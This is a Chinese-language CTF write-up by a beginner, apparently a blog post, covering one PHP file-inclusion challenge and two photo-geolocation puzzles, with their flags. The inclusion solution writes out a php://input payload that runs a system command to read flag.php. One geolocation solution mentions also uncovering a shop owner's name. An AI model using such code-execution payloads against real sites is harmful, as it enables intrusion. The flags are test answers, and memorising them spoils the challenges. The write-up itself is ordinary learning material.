说在前面,这是一个新手打比赛第一次做出题目的wp,只供于记录学习,谢谢!
考点:input伪协议
Easy_include
打开创建实例,只给了一个网址,点进去后发现,看到flag.php,直接拖入bp中抓包
改请求方式为post,运用input伪协议的方式,加入post 后加入?file=php://input,最后加入<?php system('tac flag.php');?>。得到flag
QHCTF{d7b60b09-8c54-4454-a886-de09feafedda}
请找出拍摄地所在位置
获取图片,没有太大的信息,开始在想会不会是jpg格式改txt格式,藏在记事本里面的?发现自己想多了,完全就是肉眼观察找线索(不嘻嘻)
开始也没什么头绪,知道看到这个黄色的广告牌,找到了这家店名,哎哟,打开抖音一搜索,不仅拿到了店铺的位置,甚至还把人家老板的名字都翻出来了。。。。
QHCTF{广西壮族自治区柳州市柳城县六广路与榕泉路交叉口}
你猜猜这是哪
又是一个找位置的题目,这类题目这个火热的吗。。。
老样子,还是按照我的思路走,先改文件格式试图找到线索,没用,想试试找找盲水印,也没有。。,那就很社工了,放大远处,发现有个小小的hotel字样,和一座绿色的大楼,根据前面黑色车的车牌号发现是郴州的车牌号,问了问郴州的朋友,初步定位在大华天都和维也纳酒店附近,找了找相关搜索和地图,真找到了。。。。
flag{湖南省郴州市汝城县滨河大道与神农大道交叉路口}
抽象的misc。。。
扫一扫
2588
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
